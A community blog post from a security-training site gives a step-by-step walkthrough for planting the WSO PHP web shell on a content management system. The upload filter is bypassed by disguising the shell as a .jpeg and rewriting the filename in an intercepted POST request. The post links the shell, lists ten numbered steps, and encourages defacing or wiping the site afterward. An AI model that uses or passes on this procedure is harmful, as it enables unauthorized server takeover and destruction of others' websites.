Using CMS Upload and Tamper Data to Obtain Administrative Access to a Webserver

March 9, 2017 | Views: 5125

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

So, you’ve done it. You have either successfully bypassed a CMS login or used SQL injection to obtain usernames and password hashes to the CMS and have decrypted the hashes.

You are inside the system.

What do you do now?

The next logical step is privilege escalation.

I like to use the WSO.php backdoor to obtain further access. (Shell is located here: https://github.com/tennc/webshell/blob/master/xakep-shells/PHP/wso.txt)

Now, it is important to understand that most Content Management Systems are designed NOT to let you upload .php files to the server through the CMS administrative panel. There is a way to defeat these “protections” however. I accomplish this through the use of the Tamper Data Browser Add-On.  (You can find the plugin at: https://chrome.google.com/webstore/detail/tamper-chrome-extension/hifhgpdkfodlpnlmlnmhchnkepplebkb?hl=en)

The method is very simple:
You will need to send an HTTP GET request that tells the CMS that you would like to upload a picture file. Before The POST data is sent, you want to REMOVE the .jpeg file extension so that you have in fact uploaded your shell as a .php file, not a .jpeg file.

Proof of Concept Steps:

  1. You will rename your shell as follows: shell.php.jpeg.
  2. Open the tamper data plugin.
  3. Browse to the CMS section that will allow you to upload a photo.
  4. Set the page to upload shell.jpeg.php but DO NOT submit the request to upload yet!
  5. On the tamper data plugin, click Start Tamper.
  6. On the CMS form submit the request to upload shell.php.jpeg
  7. You will then get a series of popups from the Tamper data plugin. Click “Tamper” with continue tampering checked on the popup window.
  8. You will be looking for a window to pop up that has the actual GET request and the POST request for uploading shell.php.jpeg
  9. In the POST request, you will need to edit the file name of shell.php.jpeg to shell.php. The file WILL NOT execute unless it is using the .php file extension!
  10. After the shell is uploaded, Navigate to the shells location in your browser, this will vary from CMS to CMS.
    Enjoy Administrative privileges!

From the shell, you can do things such as change the websites index page to your defacement page, delete everything, or even just show your friends and tell them how awesome you are!

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
5 Comments
  1. Wonderful! Thank you!

  2. Very basic but good trick that people should be aware off.
    However, in your post i’ve noticed this ‘decrypted the hashes’. Hashing is a one-way alghoritm, you can’t decrypt a hash. You need to crack it.

    https://en.wikipedia.org/wiki/Cryptographic_hash_function

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel